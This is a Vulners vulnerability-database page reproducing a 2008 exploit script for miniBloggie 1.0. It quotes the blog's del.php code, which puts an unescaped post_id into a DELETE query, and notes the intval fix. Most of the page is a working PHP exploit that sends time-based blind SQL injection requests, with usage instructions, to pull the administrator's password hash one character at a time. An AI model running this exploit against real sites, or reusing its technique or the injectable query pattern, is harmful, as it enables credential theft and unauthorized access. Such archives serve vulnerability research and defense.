Vulners
Lucene search
miniBloggie 1.0 - 'del.php' Blind SQL Injection
#!/usr/bin/php
<?php
error_reporting(0);
/*
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
------------------------------------------------------------
Author -> StAkeR aka athos - StAkeR[at]hotmail[dot]it
Date -> 18/10/2008
Get -> http://www.mywebland.com/dl.php?id=2
------------------------------------------------------------
File del.php
25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
27.
28. if ($confirm=="") {
29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>");
30. }
31. elseif ($confirm=="yes") {
32. // Data Base Connection //
33. dbConnect();
34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
36. $confirm ="";
37. notice("Del Post", "Data Deleted");
38. }
39. else notice( "Delete Error, Unable to complete the task !" );
40. ?>
NOTE:
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$post_id isn't escaped so you can execute SQL Code
How to fix? sanize $post_id with intval or int (PHP Functions)
*/
function get($host,$path,$evil)
{
if(!preg_match('/\w:[0-9]/i',$host)) alert();
$inet = explode(':',$host);
if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
$data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
$data .= "Host: $host[0]\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";
fputs($sock,$data);
while(!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
function alert()
{
echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
die;
}
function charme($char,$colum,$id)
{
$sql = "1 or (select if((ascii(substring(password".
",$colum,1))=$char),benchmark(200000000,char(0)),0)".
" from blogusername where id=$id)#";
return urlencode($sql);
}
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$c = 0;
for($i=0;$i<=32;$i++)
{
for($j=0;$j<=17;$j++)
{
$start = time();
get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
$stop = time();
if($stop - $start > 12)
{
$password .= chr($hash[$j]);
$c++;;
break;
}
}
}
if(isset($password))
{
echo "# Hash: $password\r\n";
die;
}
else
{
echo "# Exploit Failed!\r\n";
}
?>
# milw0rm.com [2008-10-18]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Oct 2008 00:00Current
7High risk
Vulners AI Score7